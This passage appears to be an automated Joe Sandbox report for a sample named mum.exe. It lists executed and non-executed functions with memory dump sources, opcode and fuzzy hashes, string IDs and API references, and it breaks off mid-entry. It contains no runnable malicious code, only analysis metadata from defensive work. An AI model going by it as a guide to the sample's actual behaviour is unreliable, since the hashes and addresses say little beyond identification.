Opcode ID: da949fa9ce4e2c603309babda786406e40d809a00116fe777b1c89b5df1f0cef
Instruction ID: 0d337bbb0bceaa1bf2b2cb600f92c0a3e2380dacb08c0efa97a461dea4ca77a0
Opcode Fuzzy Hash: da949fa9ce4e2c603309babda786406e40d809a00116fe777b1c89b5df1f0cef
Instruction Fuzzy Hash: FAE01274C192489FDB41DBB998496CDBFB0DF06315F2481EED805D3291E7714A48DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00244A26 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 733878520a0e1dca74414ae0d608b00b6234f606a4b43db4112920915fee473b
Instruction ID: 7ab3108e75168e1333053377a274a0ac4141731b07aadb285501951ec27755ae
Opcode Fuzzy Hash: 733878520a0e1dca74414ae0d608b00b6234f606a4b43db4112920915fee473b
Instruction Fuzzy Hash: 7AF09B78E18208DFDB64CFB8C89099CBBB0AF09304B24865ED815A7342D631A812EF04

Uniqueness

Uniqueness Score: -1.00%

Function 054C6420 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa400166bb35c1782ae11bf8dafbd3bf62c581efa14205a174f43b53f858fe8f
Instruction ID: 4d3e907624a4e9045bae74c7d6822261da2eb314eb29d88fa58b2f0649227b56
Opcode Fuzzy Hash: fa400166bb35c1782ae11bf8dafbd3bf62c581efa14205a174f43b53f858fe8f
Instruction Fuzzy Hash: 07E0C238904208EFCB00DF99D48499CBBB4FB48304F10C1A9E94567360C731AE94EF84

Uniqueness

Uniqueness Score: -1.00%

Function 054C66C8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61c43103fd4f13597793fbd9f1e9a03295df814f4d0e5434d377b382109f5e87
Instruction ID: 3537d1b5b7035ca88b3cd8f9b5231219456ca2e78d120f9fcdd6af465e496ea9
Opcode Fuzzy Hash: 61c43103fd4f13597793fbd9f1e9a03295df814f4d0e5434d377b382109f5e87
Instruction Fuzzy Hash: 9AE0EE74E0420CEFCB44DFA9D440A9DFBB5AB48304F10C2AAA904A3360D7359A94DF80

Uniqueness

Uniqueness Score: -1.00%

Function 054C6470 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1cb10584e97253dfd16a3beea4968b6115e0ed53bb1536297c47de3d10f08ff
Instruction ID: c07e1a976860347b6d7bb6ede5696db89fdac751708bbc279206d96c026db482
Opcode Fuzzy Hash: e1cb10584e97253dfd16a3beea4968b6115e0ed53bb1536297c47de3d10f08ff
Instruction Fuzzy Hash: 53E01238904208EFCB40DFA8D884A9DBBB4BB49315F10C199E9096B360C731AE94EF84

Uniqueness

Uniqueness Score: -1.00%

Function 054C93C0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 927ac5ae0d398808f79bd00f8b657b1ab543387c02a4f09142398f917da0169f
Instruction ID: 19b9ac1a4af21c726a6f14d4f15dd3c5d09eb78a244eaef7613411877f89c19b
Opcode Fuzzy Hash: 927ac5ae0d398808f79bd00f8b657b1ab543387c02a4f09142398f917da0169f
Instruction Fuzzy Hash: 38E0E534904208EBCB04DF99D540AACFBB4AB88304F14C1AAE854A7391C731AA51DF84

Uniqueness

Uniqueness Score: -1.00%

Function 054C63B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30812ef5720646b0d09ce50b5af59c30b357e6ae361d275705169ec18df30d55
Instruction ID: 16699686e25b160229cb05ee4fa0ef706d021c6f54035219e197856eb1fdf2bb
Opcode Fuzzy Hash: 30812ef5720646b0d09ce50b5af59c30b357e6ae361d275705169ec18df30d55
Instruction Fuzzy Hash: BEE01230D0420CEFCB44EFA9D84069DBBB4AB44304F1082EAD828A3350E7345A44CF81

Uniqueness

Uniqueness Score: -1.00%

Function 054C4CA3 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb92f1ecb3c77837f480775a9ea2dbafd207981be8aa657e37986d598965ace8
Instruction ID: c11510493caf3c161a449d9742225af64a2515aa3788e8aaa32c93af6cbbce25
Opcode Fuzzy Hash: bb92f1ecb3c77837f480775a9ea2dbafd207981be8aa657e37986d598965ace8
Instruction Fuzzy Hash: 7BF0FDB49012A88FDBA4CF25CD84ADDBBB6BB48301F0081DAD60DA3251EB701E85CF04

Uniqueness

Uniqueness Score: -1.00%

Function 0024A3E0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30adc2947f2bb207280e77e22dd8ed559f2c2de805448def10bb25f20c336728
Instruction ID: 853c3da0837c1f71e4892726ffd3d157b00572e270f395d2b85a2cb818429c36
Opcode Fuzzy Hash: 30adc2947f2bb207280e77e22dd8ed559f2c2de805448def10bb25f20c336728
Instruction Fuzzy Hash: 1FE0E534955209CFEB20DFB4D4489ACBBB2FB48300F20462EA412A3295DB700985AF41

Uniqueness

Uniqueness Score: -1.00%

Function 054C6538 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24c0e5e91252169c41e6d9c46170ce3f3b7b30aaf11d6550fe15067bc49b72ef
Instruction ID: 657b7cb94e5ef1af1c1ce6dd881e074a967da236ac69c865d02b4645498e0269
Opcode Fuzzy Hash: 24c0e5e91252169c41e6d9c46170ce3f3b7b30aaf11d6550fe15067bc49b72ef
Instruction Fuzzy Hash: 8AE0EC7491420CEFCB40DFBCD94969DBBB4EB44205F1081A9980893350E7305A44DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00240448 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65aeaca57dea6e9f6ced22501f252da4a2138230f34bf2cbcdec4446c4266b46
Instruction ID: f60b5d638df63f45b324dd0ade1da5c5c096f936d8f3034a4c6b2309a32aef0c
Opcode Fuzzy Hash: 65aeaca57dea6e9f6ced22501f252da4a2138230f34bf2cbcdec4446c4266b46
Instruction Fuzzy Hash: 51C01222314A39124A6932F81823A7F32494E814AA300003DD20F9B3D1DF2EAE0202FE

Uniqueness

Uniqueness Score: -1.00%

Function 002416E0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9a2ab2463aab529d63232e4f2a7454853c934b4541beabde7f68d071eab7b98
Instruction ID: 497e3f47db9b2516c574ef985170c70ea52f22611ffa2f952df5c03c3fccd958
Opcode Fuzzy Hash: f9a2ab2463aab529d63232e4f2a7454853c934b4541beabde7f68d071eab7b98
Instruction Fuzzy Hash: CDD05E74A0120DEF8B40EFA8EA4189DB7B9EB49204B1045A9E809EB300EB312F559B90

Uniqueness

Uniqueness Score: -1.00%

Function 054C1CA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 056d772f1ce4e73bc257b9d92466b7dbb0f7985f3bcff4e3dbad84adfa34eee9
Instruction ID: 44e85f6a9a01b58c3382a86041436349d4d285ea757ae3b125ef6754db41ca90
Opcode Fuzzy Hash: 056d772f1ce4e73bc257b9d92466b7dbb0f7985f3bcff4e3dbad84adfa34eee9
Instruction Fuzzy Hash: AFD012B4804118CEDB108B64C84878AB7F1FB10340F0450E6C8596B202DB3607469F61

Uniqueness

Uniqueness Score: -1.00%

Function 054C10D6 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f07d89dbec096ba7a2a71c4ec9dad9090f0246ef1f6b1673d4d3bec6319579bb
Instruction ID: b5b554e1fc331cb287bab18095834c9054cf7d6d87423971a5f0023f8bab592a
Opcode Fuzzy Hash: f07d89dbec096ba7a2a71c4ec9dad9090f0246ef1f6b1673d4d3bec6319579bb
Instruction Fuzzy Hash: DBE07574815219CFDBA0DF14DC84BDDBB77BB84314F0085DAA409A3250DB711A95CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00243750 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccaf9bd459115dfef17cfb1226c5ea002b7d570882e458e7514866baa08112f2
Instruction ID: 1bf80eb5512a945ddc612a8b9efb37bbcf9f66d0799504547a1e8523e66cff54
Opcode Fuzzy Hash: ccaf9bd459115dfef17cfb1226c5ea002b7d570882e458e7514866baa08112f2
Instruction Fuzzy Hash: 46D017B0C18249CBDB60CFA5E8044AEBB70FF0A304F10511AC83263292C3340501CF02

Uniqueness

Uniqueness Score: -1.00%

Function 00243100 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ee6e3abed67a9e193c4593394d6bc3d5c2d0e0c4036b9045dac97743325dfa
Instruction ID: 20fa44af464fb8034ddcc4171042a0311495faba79e5bc07acee999f3b31b5b1
Opcode Fuzzy Hash: 37ee6e3abed67a9e193c4593394d6bc3d5c2d0e0c4036b9045dac97743325dfa
Instruction Fuzzy Hash: B0C0485080E3C51FC31383B1082D901AFB82C6724C30E84CBCE80CE0ABD6284C48C372

Uniqueness

Uniqueness Score: -1.00%

Function 0024373D Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33ea5189f88f74601eeb7b83ab755f49b26faa37879d88ea54c095b4f7c0639f
Instruction ID: f6e34ca9656d495092301e52b576fbb21b9777f20825b561d261dbf27a6d799a
Opcode Fuzzy Hash: 33ea5189f88f74601eeb7b83ab755f49b26faa37879d88ea54c095b4f7c0639f
Instruction Fuzzy Hash: FAD0CAB8C2820ACB8B58CFA2E9444AEBBB0BB25350B20041A9002A3201C7701A60CE81

Uniqueness

Uniqueness Score: -1.00%

Function 002418B0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9eab6479a04b78b43b565369382afe00ee121122f9dd8927714e50d8888ce68
Instruction ID: faaab6b1910644ee50349cdb3cb9683a068bdc8820b1323becf1c9dae9311096
Opcode Fuzzy Hash: f9eab6479a04b78b43b565369382afe00ee121122f9dd8927714e50d8888ce68
Instruction Fuzzy Hash: 12B0123031420A4E26905BB22D0861277CC6A105043400420990CC0400FA00DC600140

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0024A8F0 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

@2l, xrefs: 0024AB12

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: @2l
API String ID: 0-805983724
Opcode ID: 08b1ac1dbd91a6e4fba6fc7108f03e0835a67fd8d9fcbcb1a44dc11139f12e81
Instruction ID: 886d9996e0bd35d430737e2542f5f8108db5ebcdfb2a02cd17a8a9fcb8f2632b
Opcode Fuzzy Hash: 08b1ac1dbd91a6e4fba6fc7108f03e0835a67fd8d9fcbcb1a44dc11139f12e81
Instruction Fuzzy Hash: 76618070910608CFD748EFBAD841A8DBBF7ABC8304F04C97AD1149B269EF70590A9F55

Uniqueness

Uniqueness Score: -1.00%

Function 0024A900 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

@2l, xrefs: 0024AB12

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID: @2l
API String ID: 0-805983724
Opcode ID: 25aa09d0628b5a11a08ccc529d06232f9df16f6a6b2c63f227f5df7f5fd9abfa
Instruction ID: 10f4cb2f6a2d747679a8a160ed2124087fe79380a39e020701bd42b087eff597
Opcode Fuzzy Hash: 25aa09d0628b5a11a08ccc529d06232f9df16f6a6b2c63f227f5df7f5fd9abfa
Instruction Fuzzy Hash: 25616D7091060CCFD748EFBAD841A9DBBF7ABC8304F04C97AD1249B669EF7059098B95

Uniqueness

Uniqueness Score: -1.00%

Function 054C0006 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

C, xrefs: 054C0159

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID: C
API String ID: 0-1037565863
Opcode ID: 472963d47d47f27802ce6f1be76ea2534feb6667b7d3810facac044118e64c12
Instruction ID: 6b25a276db3cf42ccd4a4637aeb31930b1e222b57ade921bee104bb68da38900
Opcode Fuzzy Hash: 472963d47d47f27802ce6f1be76ea2534feb6667b7d3810facac044118e64c12
Instruction Fuzzy Hash: 90415171D05A548FE75DCF6B8D4579AFAF3AFC5201F09C1FA844CAA265EB3409428F11

Uniqueness

Uniqueness Score: -1.00%

Function 048B0048 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

C, xrefs: 048B345B

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID:
String ID: C
API String ID: 0-1037565863
Opcode ID: 44390c9cd1eb5dd967f51b242ac6d1fa947dc8a574414aac2906e0ec952b5f0d
Instruction ID: 05b85092c18206b3ce3e027a11497d64216f94b4a9e71631240ea68e8757355f
Opcode Fuzzy Hash: 44390c9cd1eb5dd967f51b242ac6d1fa947dc8a574414aac2906e0ec952b5f0d
Instruction Fuzzy Hash: 7E414471E05A188BEB5CCF6B8D4079BFAF7AFC9201F14C1B9854CAA265EB7019818F41

Uniqueness

Uniqueness Score: -1.00%

Function 054C0048 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

C, xrefs: 054C0159

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID: C
API String ID: 0-1037565863
Opcode ID: 3ee17c0135a08a14df5043929add95af05f7c17382b06ea97af34bce082c30b3
Instruction ID: ad00d902b3fe19542515605402ae91cedd925d482192da1bb0c26d1949838fb6
Opcode Fuzzy Hash: 3ee17c0135a08a14df5043929add95af05f7c17382b06ea97af34bce082c30b3
Instruction Fuzzy Hash: 56414171D05A18CBE75CCF6B8D4079AFAF7AFC9201F04C1FA840CAA255EB304A828F11

Uniqueness

Uniqueness Score: -1.00%

Function 048B58FE Relevance: .6, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.978783836.00000000048B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_48b0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 281fd3155729035f5806cd6438689e1bec2bff15456d1428c98a322fc039018f
Instruction ID: a5c7275b16166471498d2f2194a29aaf8713fbdd6c36aa93c72a7991d6080b9e
Opcode Fuzzy Hash: 281fd3155729035f5806cd6438689e1bec2bff15456d1428c98a322fc039018f
Instruction Fuzzy Hash: 7E327571A0468A9FCB11CF6DC4D5DD5BBE0FF0A31875149ACE0958B22BCB24A927CF85

Uniqueness

Uniqueness Score: -1.00%

Function 054C6C52 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.983297829.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_54c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efbaf3f85fb9594b7d96e12e3b9d67e2fa768329bbaf900a6c80d8575bdcc5ac
Instruction ID: 8b6d81579892d09348862beba5183d12f92208afa65a4cd8dfda6c14388ebf9d
Opcode Fuzzy Hash: efbaf3f85fb9594b7d96e12e3b9d67e2fa768329bbaf900a6c80d8575bdcc5ac
Instruction Fuzzy Hash: 96811574E05258DFDB94CFA9C8807EEBBB2EF89300F1094AAD10AAB350D7745A85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00243FA0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.956473139.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_240000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 546551049a5d533916b3220e140cb73fef70708e144066a8c0be702949fbcf1f
Instruction ID: 91af8187c2201fdb61e76c3d5a9ee00fa1fd0575da48a333edf1122f1aaeb095
Opcode Fuzzy Hash: 546551049a5d533916b3220e140cb73fef70708e144066a8c0be702949fbcf1f
Instruction Fuzzy Hash: C711AA71E14B189BEB18CF6B8C0079AFAF7AFC9300F04C1AAD509A6254EB7019858F51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mum.exePID: 2588, Parent PID: 1724COMMON

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	58%
Total number of Nodes:	231
Total number of Limit Nodes:	16

Executed Functions

Function 002C9151 Relevance: 6.0, Strings: 3, Instructions: 2235COMMON

Download Yara Rule

Strings

Rh0, xrefs: 002C9EAF
K, xrefs: 002CB7DA
Rh0, xrefs: 002C9EDC

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID: K$Rh0$Rh0
API String ID: 0-4255857475
Opcode ID: e81d4eb774f6d1969a111b0b5009de07ca3752c0524fd2a6ae3eac064a5539d4
Instruction ID: e14e2bbfe60538e5992bd8f7b4f30e238a97d7b3b410d908b3b638a253b555bd
Opcode Fuzzy Hash: e81d4eb774f6d1969a111b0b5009de07ca3752c0524fd2a6ae3eac064a5539d4
Instruction Fuzzy Hash: 3D33E230C246198ECB11EF68C894AEDF7B1FF99304F55869AD54C67221EB70AAD4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 002C2620 Relevance: 1.8, APIs: 1, Instructions: 271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 002C26FC

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6593de20916a840e0c77880a711d154693c603c3763311e08a692b33b9fb29c2
Instruction ID: b8076f4110966b1e8216756441d32e9a693131c2092b5460609518a3eb1d4ce9
Opcode Fuzzy Hash: 6593de20916a840e0c77880a711d154693c603c3763311e08a692b33b9fb29c2
Instruction Fuzzy Hash: ACD1E274E10218CFDB14DFA5D994B9DBBB2BF88304F2481AAD809A7365DB349E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 003E6838 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E6903

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e676328c7b6750218e8f4e62ccc7307f38ff3faa1dc3a22c6f15c947da53cc27
Instruction ID: 9035281b10a8dc5fe3975f6645b4bfdf6ccc05c22d51a54c415343a64d87038d
Opcode Fuzzy Hash: e676328c7b6750218e8f4e62ccc7307f38ff3faa1dc3a22c6f15c947da53cc27
Instruction Fuzzy Hash: A7C1D174E00218CFDB14DFA5C995B9DBBB2BF89304F2091AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 003E5B30 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E5BFB

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 959571c165f832fb98712e07fc406d90c6a35699f836af199bdf143290f091e7
Instruction ID: 692953d766c13418618d552db1d120fd8bd3746178a9868b7449045921fafe4b
Opcode Fuzzy Hash: 959571c165f832fb98712e07fc406d90c6a35699f836af199bdf143290f091e7
Instruction Fuzzy Hash: 44C1C274E00218CFDB14DFA5C994B9DBBB2BF89305F2081AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E8B20 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E8BEB

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: ff6b44e851104f5f5ef1962977aabbb6849149ac1acc320ec845fe42e8447c1f
Instruction ID: d7f05cd76969206c763edeb6a247637b78552203cd4225977774a2a26d936dbb
Opcode Fuzzy Hash: ff6b44e851104f5f5ef1962977aabbb6849149ac1acc320ec845fe42e8447c1f
Instruction Fuzzy Hash: F6C1D474E00218CFDB14DFA5C994B9DBBB2BF89305F2081AAD809AB395DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 003E7E18 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E7EE3

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 2ab43c727e9dd588782432a77979f54b79f5c5975983ab102cb359d5de36f786
Instruction ID: 0b9436e8b2ab26caa57ddc280dd644a03c2d49cdb081dd45016f18b2bea31714
Opcode Fuzzy Hash: 2ab43c727e9dd588782432a77979f54b79f5c5975983ab102cb359d5de36f786
Instruction Fuzzy Hash: CCC1D374E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E7110 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E71DC

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1b773b0f883b796f303b43b37ffceba8705e0aa9840eb31fd7e0dd58695856a0
Instruction ID: f3307e355b85ae6bd4a8d1f22741dd8ffa072f52c9d74d3b76de892bb20c84ac
Opcode Fuzzy Hash: 1b773b0f883b796f303b43b37ffceba8705e0aa9840eb31fd7e0dd58695856a0
Instruction Fuzzy Hash: 72C1E574E00218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E1600 Relevance: 1.8, APIs: 1, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E16CB

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 006fb4f0f4407b32ed2b43dccefea73f5b9644e483906dc3b5100346ebd8c244
Instruction ID: 9829c029460af09131d8bb646823dcabf576170ca6df6b079b1404c44f415868
Opcode Fuzzy Hash: 006fb4f0f4407b32ed2b43dccefea73f5b9644e483906dc3b5100346ebd8c244
Instruction Fuzzy Hash: 6EC1E274E00218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E8F78 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E9043

Memory Dump Source

